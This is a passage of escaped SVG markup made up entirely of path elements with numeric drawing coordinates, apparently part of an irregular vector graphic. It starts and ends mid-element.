d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path 